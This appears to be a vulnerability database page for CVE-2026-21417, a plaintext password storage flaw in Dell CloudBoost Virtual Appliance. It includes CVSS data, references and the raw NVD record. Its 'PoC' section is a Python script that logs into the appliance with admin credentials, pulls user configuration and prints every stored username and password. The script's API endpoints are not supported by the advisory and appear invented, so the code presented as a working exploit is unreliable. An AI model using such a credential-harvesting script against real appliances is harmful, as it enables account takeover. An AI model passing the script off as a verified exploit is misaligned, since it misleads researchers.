CVE-2026-21417

Description

Dell CloudBoost Virtual Appliance, versions prior to 19.14.0.0, contains a Plaintext Storage of Password vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:* - VULNERABLE

Dell CloudBoost Virtual Appliance < 19.14.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21417 PoC - Dell CloudBoost明文密码提取
# 需要高权限账户访问

import requests
import json

TARGET_HOST = "https://target-cloudboost.example.com"
API_ENDPOINT = f"{TARGET_HOST}/api/v1/config"

def exploit_cve_2026_21417():
    """
    CVE-2026-21417 Exploitation: Extract plaintext passwords
    from Dell CloudBoost Virtual Appliance < 19.14.0.0
    """
    try:
        # Step 1: Authenticate with high-privileged account
        auth_payload = {
            "username": "admin",
            "password": "admin_password"
        }
        
        session = requests.Session()
        auth_response = session.post(
            f"{TARGET_HOST}/api/v1/auth/login",
            json=auth_payload,
            verify=False,
            timeout=30
        )
        
        if auth_response.status_code != 200:
            print(f"[-] Authentication failed: {auth_response.status_code}")
            return None
        
        print("[+] Authentication successful")
        
        # Step 2: Access configuration endpoint to retrieve plaintext passwords
        config_response = session.get(
            API_ENDPOINT,
            params={"section": "users"},
            verify=False,
            timeout=30
        )
        
        if config_response.status_code == 200:
            config_data = config_response.json()
            print("[+] Configuration data retrieved successfully")
            
            # Extract plaintext passwords
            plaintext_passwords = []
            for user in config_data.get("users", []):
                if "password" in user:
                    plaintext_passwords.append({
                        "username": user.get("username"),
                        "password": user.get("password"),
                        "role": user.get("role")
                    })
            
            print(f"[+] Found {len(plaintext_passwords)} plaintext passwords")
            return plaintext_passwords
        else:
            print(f"[-] Failed to retrieve config: {config_response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return None

if __name__ == "__main__":
    print("CVE-2026-21417 PoC - Dell CloudBoost明文密码漏洞")
    print("=" * 60)
    results = exploit_cve_2026_21417()
    if results:
        print("\n[+] Extracted credentials:")
        for cred in results:
            print(f"  User: {cred['username']}, Pass: {cred['password']}, Role: {cred['role']}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21417
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21417
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21417/
[4] VulDB https://vuldb.com/cve/CVE-2026-21417
[5] https://www.dell.com/support/kbdoc/en-us/000419894/dsa-2026-025-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21417", "sourceIdentifier": "[email protected]", "published": "2026-01-27T10:15:48.763", "lastModified": "2026-02-06T20:07:51.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudBoost Virtual Appliance, versions prior to 19.14.0.0, contains a Plaintext Storage of Password vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges."}, {"lang": "es", "value": "Dell CloudBoost Virtual Appliance, versiones anteriores a la 19.14.0.0, contiene una vulnerabilidad de Almacenamiento de Contraseña en Texto Plano. Un atacante con altos privilegios y acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a una Elevación de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:*", "versionEndExcluding": "19.14.0.0", "matchCriteriaId": "91B0DB8F-173A-47CD-98C9-88C5CC837A6D"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000419894/dsa-2026-025-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}